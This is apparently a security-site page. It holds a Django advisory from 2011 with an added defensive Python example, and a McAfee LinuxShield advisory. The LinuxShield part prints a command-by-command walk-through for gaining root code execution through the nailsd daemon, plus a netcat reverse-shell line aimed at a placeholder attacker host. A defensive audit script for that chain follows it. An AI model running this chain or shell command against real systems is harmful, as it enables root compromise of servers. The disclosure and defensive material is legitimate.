Multiple security vulnerabilities in the Django development framework
Published: 2011-09-12

Affected versions:
Django 1.2.5
Django 1.3 beta 1
Django 1.2.4
Django 1.2.2
Django 1.2

Vulnerability description:

Django is an open-source web application framework written in Python.
Django contains multiple security vulnerabilities that allow an attacker to obtain sensitive information, manipulate data, carry out cache poisoning attacks, or cause a denial of service.

1) When a cache backend is used, session handling in django.contrib.sessions contains an error that can be exploited to manipulate session data. Successful exploitation requires a known session key and an application that lets the attacker store a dictionary-like object in the cache under a valid session key.
2) The Django model system includes a field type, URLField, that validates whether a supplied value is a valid URL; when the boolean keyword argument verify_exists is true, it also tries to verify the supplied URL by resolving it. By default the underlying socket has no timeout, so an attacker can submit a specially crafted URL that consumes all of the server's memory, causing a denial of service.
3) When the URLs supplied to a URLField are verified, redirect responses are handled incorrectly; an attacker can answer the verification request with a redirect to a file:// URL and thereby determine whether a given local file exists on the server.
4) When the full URL for a redirect response is generated, the X-Forwarded-Host HTTP header is handled incorrectly; an attacker can exploit this to carry out cache poisoning attacks.

References:
https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
http://secunia.com/advisories/45939/
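Two of the checks behind items 2 to 4 of the advisory, written out as an added example in Python; this is not Django's code and not taken from the advisory. url_exists() performs a verify_exists-style lookup with a bounded socket timeout and re-checks the URL scheme on every redirect hop, so a redirect to file:// is refused instead of followed; build_absolute_uri() mirrors the opt-in that the fixed releases introduced (the USE_X_FORWARDED_HOST setting, off by default), so a client-supplied X-Forwarded-Host header cannot become the Location of a cached redirect. The function names, the 10-second timeout, the 5-hop limit, FAKE_RESPONSES and SAMPLE_META are assumptions constructed for this example.

```python
"""Hardened URL verification and redirect-host selection (added example, not Django code)."""
import socket
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlparse

ALLOWED_SCHEMES = ("http", "https")   # a redirect to file:// or ftp:// is refused
TIMEOUT_SECONDS = 10                  # bound on every socket operation (assumed value)
MAX_REDIRECTS = 5                     # bound on the number of hops (assumed value)
REDIRECT_CODES = (301, 302, 303, 307, 308)


class UnsafeURL(ValueError):
    """Raised when the URL itself or a redirect target uses a disallowed scheme."""


def check_scheme(url):
    scheme = urlparse(url).scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise UnsafeURL(f"refusing {url!r}: scheme {scheme!r} is not allowed")
    return url


class _NoFollow(urllib.request.HTTPRedirectHandler):
    """Keep urllib from following redirects on its own; url_exists() walks each hop."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def head_once(url, timeout=TIMEOUT_SECONDS):
    """One HEAD request with a socket timeout. Returns (status, Location header or None)."""
    opener = urllib.request.build_opener(_NoFollow)
    request = urllib.request.Request(url, method="HEAD")
    try:
        with opener.open(request, timeout=timeout) as response:
            return response.status, response.headers.get("Location")
    except urllib.error.HTTPError as err:       # 3xx/4xx/5xx are delivered as exceptions
        return err.code, err.headers.get("Location")


def url_exists(url, fetch=head_once, max_redirects=MAX_REDIRECTS):
    """True if the URL answers with a non-error status. Every redirect target is
    scheme-checked before it is fetched, and network failures fail closed."""
    current = check_scheme(url)
    for _ in range(max_redirects + 1):
        try:
            status, location = fetch(current)
        except OSError:                          # URLError and socket.timeout are OSErrors
            return False                         # unreachable or too slow: never hang the worker
        if status in REDIRECT_CODES and location:
            current = check_scheme(urljoin(current, location))   # file:// is caught here
            continue
        return 200 <= status < 400
    return False                                 # redirect loop or too many hops


def validate(url, fetch=head_once):
    """Validator-style wrapper: 'ok', 'unreachable' or 'unsafe' instead of exceptions."""
    try:
        return "ok" if url_exists(url, fetch=fetch) else "unreachable"
    except UnsafeURL:
        return "unsafe"


def request_host(meta, use_x_forwarded_host=False, secure=False):
    """Choose the host for absolute URLs. X-Forwarded-Host is honoured only when the
    deployment opts in, as the fixed Django releases do with USE_X_FORWARDED_HOST."""
    if use_x_forwarded_host and "HTTP_X_FORWARDED_HOST" in meta:
        return meta["HTTP_X_FORWARDED_HOST"]
    if "HTTP_HOST" in meta:
        return meta["HTTP_HOST"]
    default_port = "443" if secure else "80"
    host, port = meta["SERVER_NAME"], str(meta.get("SERVER_PORT", default_port))
    return host if port == default_port else f"{host}:{port}"


def build_absolute_uri(meta, path, use_x_forwarded_host=False, secure=False):
    scheme = "https" if secure else "http"
    return f"{scheme}://{request_host(meta, use_x_forwarded_host, secure)}{path}"


# Constructed stand-ins for the network and for a WSGI environ, so the example runs offline.
FAKE_RESPONSES = {
    "http://example.test/ok":   (200, None),
    "http://example.test/hop":  (302, "/ok"),
    "http://example.test/leak": (302, "file:///etc/passwd"),
    "http://example.test/loop": (301, "/loop"),
}
SAMPLE_META = {"HTTP_HOST": "app.example", "HTTP_X_FORWARDED_HOST": "attacker.example",
               "SERVER_NAME": "app.example", "SERVER_PORT": "80"}


def fake_fetch(url):
    if url == "http://example.test/slow":
        raise socket.timeout("simulated: the server never answers")
    if url not in FAKE_RESPONSES:
        raise urllib.error.URLError("simulated: connection refused")
    return FAKE_RESPONSES[url]


if __name__ == "__main__":
    for target in ("hop", "leak", "loop", "slow", "missing"):
        print(f"http://example.test/{target}: {validate(f'http://example.test/{target}', fake_fetch)}")
    print(build_absolute_uri(SAMPLE_META, "/login/"))                              # trusts Host only
    print(build_absolute_uri(SAMPLE_META, "/login/", use_x_forwarded_host=True))   # opt-in behaviour
```

The timeout alone closes item 2; item 3 needs the per-hop scheme check, because the first URL can be a perfectly ordinary http:// address and only its Location header points at file://. For item 4 the point is the default: unless a reverse proxy is known to rewrite X-Forwarded-Host, the header is attacker-controlled input and must not reach a Location header that a shared cache may store.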
Notice: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.

 


McAfee LinuxShield local/remote code execution vulnerability
McAfee LinuxShield remote/local code
Affected versions: McAfee LinuxShield <= 1.5.1
Remote attack: Yes
Local overflow: Yes
Background:
===========
LinuxShield detects and removes viruses and other potentially unwanted software on Linux-based systems. LinuxShield uses the powerful McAfee scanning engine, the engine common to all our anti-virus products.

Although a few years ago, the Linux operating system was considered a secure environment, it is now seeing more occurrences of software specifically written to attack or exploit security weaknesses in Linux-based systems. Increasingly, Linux-based systems interact with Windows-based computers. Although viruses written to attack Windows-based systems do not directly attack Linux systems, a Linux server can harbor these viruses, ready to infect any client that connects to it.

When installed on your Linux systems, LinuxShield provides protection against viruses, Trojan horses, and other types of potentially unwanted software.

LinuxShield scans files as they are opened and closed, a technique known as on-access scanning. LinuxShield also incorporates an on-demand scanner that enables you to scan any directory or file in your host at any time.

When kept up-to-date with the latest virus-definition (DAT) files, LinuxShield is an important part of your network security. We recommend that you set up an anti-virus security policy for your network, incorporating as many protective measures as possible.

LinuxShield uses a web-browser interface, and a large number of LinuxShield installations can be centrally controlled by ePolicy Orchestrator.

(Product description from LinuxShield Product Guide)


Description:
============

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of McAfee LinuxShield. User interaction is not required to exploit this vulnerability, but an attacker must be authenticated.

The LinuxShield web interface communicates with the locally installed "nailsd" daemon, which listens on port 65443/tcp, to make configuration changes, query the configuration and execute tasks.

Each user who can log in to the victim box can also authenticate to "nailsd" and can make configuration changes and execute tasks with root privileges.

A direct execution of commands is not possible, but it is possible to download and execute code through manipulation of the config and execution of scheduled tasks of LinuxShield.

walk-through (after the TLS handshake):
+--------------------------------------

nailsd > +OK welcome to the NAILS Statistics Service
attacker> auth <user> <pass>
nailsd > +OK successful authentication

# Set the Attacker repository to download our code from a httpd
# (catalog.z)
#---------------------------------------------------------------
attacker> db set 1 _table=repository status=1 siteList=<?xml version="1.0" encoding="UTF-8"?><ns:SiteLists xmlns:ns="naSiteList" GlobalVersion="20030131003110" LocalVersion="20091209161903" Type="Client"><SiteList Default="1" Name="SomeGUID"><HttpSite Type="repository" Name="EvilRepo" Order="1" Server="<attackerhost>:80" Enabled="1" Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></UserName><Password Encrypted="0"/></HttpSite></SiteList></ns:SiteLists> _cmd=update
nailsd > +OK database changes buffered.

# Execute task to set the attacker repository
#---------------------------------------------------------------
attacker> task setsitelist
nailsd > +OK setting sitelist from CMA.

# Execute the default Update task to download the code
#---------------------------------------------------------------
attacker> task nstart LinuxShield Update
nailsd > +OK task LinuxShield Update starting

# Create a Scan profile, which executes our code. The profiles are
# not stored in the database.
# Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
#---------------------------------------------------------------
attacker> sconf ODS_99 begin
nailsd > +OK 1260400888

# Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
# where our earlier downloaded catalog.z file is stored.
# (/opt/McAfee/cma/scratch/update/catalog.z)
#---------------------------------------------------------------
attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.ODS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/engine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.profile.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heuristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=true nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profile.ODS_99.program=true nailsd.profile.ODS_99.quarantineChildren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantine nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.profile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTmo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=true nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=10000 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.filter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.profile.ODS_99.filter.extensions.type=extension nailsd.profile.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99.action.Default.secondary=Quarantine nailsd.profile.ODS_99.action.App.primary=Clean nailsd.profile.ODS_99.action.App.secondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pass nailsd.profile.ODS_99.action.error=Block
nailsd > +OK configuration changes buffered
attacker> sconf ODS_99 commit 1260400888
nailsd > +OK configuration changes stored

# Set a scan task with the manipulated profile to execute the code
#---------------------------------------------------------------
attacker> db set 1260400888 _table=schedule taskName=Evil Task taskType=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/tmp;exclude:false timetable=type=unscheduled taskResults= _lastRun=1260318482 status=Stopped _cmd=insert
nailsd > +OK database changes buffered

# Execute scan task to execute the code
#---------------------------------------------------------------
attacker> task nstart Evil Task

+-------------------------------------- walk-through EOF

To get a reverse root shell place something like this in the catalog.z

--- snip ---
#!/bin/sh
nc -nv <attacker_host> 4444 -e /bin/sh
--- /snip ---


Proof of Concept :
==================

http://inj3ct0r.com/sploits/11165.tar.gz


Solution:
=========

McAfee Advisory
+--------------
https://kc.mcafee.com/corporate/index?page=content&id=SB10007


Disclosure Timeline (YYYY/MM/DD):
=================================

2009.12.07: Vulnerability found
2010.02.03: Asked vendor for a PGP key
2010.02.05: Vendor sent his PGP key
2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure date (2010.02.18) to Vendor
2010.02.05: Vendor acknowledges the reception of the advisory
2010.02.16: Ask for a status update, because the planned release date is 2010.02.18.
2010.02.16: Vendor response that they are currently working on a patch
2010.02.17: Changed release date to 2010.02.25.
2010.02.22: Vendor gives a status update that they are able to release the patch on 2010.02.25.
2010.02.24: Ask for a list of affected products and the advisory url.
2010.02.24: Vendor sends the list.
2010.03.02: Release of this Advisory
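A defender-side audit of the command stream shown in the walk-through, as an added example in Python; it is not McAfee's code and not part of the advisory. It reads client commands in the "speaker> command" form of the transcript above and flags the three configuration changes the advisory chains together: a repository siteList whose HttpSite Server is not on an allow-list (or cannot be parsed at all), a profile whose scannerPath is set outside the engine directory, and a scheduled task that references such a profile and is then started. ENGINE_ROOT, ALLOWED_REPO_SERVERS and SAMPLE_SESSION are assumptions constructed for the example; the page does not document how nailsd itself logs commands, so in practice the input would come from whatever captures the daemon's command channel.

```python
"""Audit a captured nailsd command stream for the advisory's configuration chain
(added example; the line format, ENGINE_ROOT and the allow-list are assumptions)."""
import re
import xml.etree.ElementTree as ET

ENGINE_ROOT = "/opt/NAI/LinuxShield/engine/"          # assumed: the only place a scanner may live
ALLOWED_REPO_SERVERS = {"repo.internal.example:80"}   # assumed: update repositories that are allowed

LINE_RE = re.compile(r"^(?:(?P<speaker>\S+?)\s*>\s*)?(?P<verb>\S+)\s*(?P<rest>.*)$")
SITELIST_RE = re.compile(r"siteList=(<\?xml.*?</ns:SiteLists>)")
SCANNER_KEY_RE = re.compile(r"^nailsd\.profile\.(\w+)\.scannerPath$")
PROFILE_RE = re.compile(r"taskInfo=profileName=(\w+)")
TASKNAME_RE = re.compile(r"taskName=(.+?)\s+\w+=")


def kv_pairs(text):
    """(key, value) for whitespace-separated key=value tokens, as in 'sconf ... set'."""
    for token in text.split():
        if "=" in token:
            yield tuple(token.split("=", 1))


def repository_findings(lineno, rest):
    """Flag every HttpSite in a siteList update whose Server is not allow-listed."""
    match = SITELIST_RE.search(rest)
    if not match:
        return [("repository-change", f"line {lineno}: no siteList XML found")]
    try:
        root = ET.fromstring(match.group(1))
    except ET.ParseError:
        return [("repository-change", f"line {lineno}: unparseable siteList")]
    return [("untrusted-repository", f"line {lineno}: {site.get('Name')} -> {site.get('Server')}")
            for site in root.iter("HttpSite") if site.get("Server") not in ALLOWED_REPO_SERVERS]


def audit_session(lines):
    """Return (kind, detail) findings for one client session, in order of appearance."""
    findings, tampered_profiles, tampered_tasks = [], set(), set()
    for lineno, raw in enumerate(lines, 1):
        match = LINE_RE.match(raw.strip())
        if not match or match.group("speaker") == "nailsd":
            continue                                   # daemon replies carry no commands
        verb, rest = match.group("verb"), match.group("rest")
        parts = rest.split()
        if verb == "db" and "_table=repository" in rest:
            findings.extend(repository_findings(lineno, rest))
        elif verb == "sconf" and len(parts) > 2 and parts[1] == "set":
            for key, value in kv_pairs(rest):
                key_match = SCANNER_KEY_RE.match(key)
                if key_match and not value.startswith(ENGINE_ROOT):
                    tampered_profiles.add(key_match.group(1))
                    findings.append(("scanner-path-outside-engine",
                                     f"line {lineno}: {key_match.group(1)} -> {value}"))
        elif verb == "db" and "_table=schedule" in rest:
            profile = PROFILE_RE.search(rest)
            if profile and profile.group(1) in tampered_profiles:
                name = TASKNAME_RE.search(rest)
                task = name.group(1) if name else "<unnamed>"
                tampered_tasks.add(task)
                findings.append(("task-uses-tampered-profile",
                                 f"line {lineno}: {task!r} uses {profile.group(1)}"))
        elif verb == "task" and parts[:1] == ["nstart"]:
            task = rest[len("nstart"):].strip()
            if task in tampered_tasks:
                findings.append(("tampered-task-started", f"line {lineno}: {task!r}"))
    return findings


# Constructed session in the transcript's "speaker> command" form (not a real capture).
SAMPLE_SESSION = [
    "nailsd > +OK welcome to the NAILS Statistics Service",
    "client> auth someuser somepass",
    'client> db set 1 _table=repository status=1 siteList=<?xml version="1.0" encoding="UTF-8"?>'
    '<ns:SiteLists xmlns:ns="naSiteList" Type="Client"><SiteList Default="1" Name="SomeGUID">'
    '<HttpSite Type="repository" Name="EvilRepo" Order="1" Server="203.0.113.10:80" Enabled="1" Local="1">'
    "<RelativePath>nai</RelativePath><UseAuth>0</UseAuth></HttpSite></SiteList></ns:SiteLists> _cmd=update",
    "client> task setsitelist",
    "client> sconf ODS_99 begin",
    "client> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=true "
    "nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so "
    "nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z",
    "client> sconf ODS_99 commit 1260400888",
    "client> db set 1260400888 _table=schedule taskName=Evil Task taskType=On-Demand "
    "taskInfo=profileName=ODS_99,paths=path:/tmp;exclude:false timetable=type=unscheduled _cmd=insert",
    "client> task nstart Evil Task",
    "client> sconf ODS_1 set 7 nailsd.profile.ODS_1.scannerPath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so",
]

if __name__ == "__main__":
    for kind, detail in audit_session(SAMPLE_SESSION):
        print(f"{kind:30} {detail}")
```

The profile check is the one that matters most: the repository change and the task insert each look like routine administration on their own, but a scanner path pointing at the CMA download scratch area is never legitimate, and once a profile is marked the later schedule and nstart commands are correlated against it rather than judged in isolation. A siteList that does not parse is reported as well, since an unparseable update is as suspicious as an untrusted one.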